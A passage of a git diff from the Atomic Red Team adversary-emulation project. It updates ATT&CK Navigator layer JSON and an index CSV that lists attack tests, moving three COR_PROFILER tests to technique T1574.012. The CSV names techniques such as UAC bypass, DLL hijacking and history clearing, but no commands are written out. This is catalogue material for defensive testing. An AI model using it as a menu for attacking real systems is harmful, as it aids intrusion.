:"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 20b13541..7eccea76 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 69df03ea..bd7593db 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -16,10 +16,10 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod
 privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
 privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
@@ -96,10 +96,10 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4ab
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
+persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-persistence,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
@@ -221,6 +221,9 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru
 defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
+defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
 defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
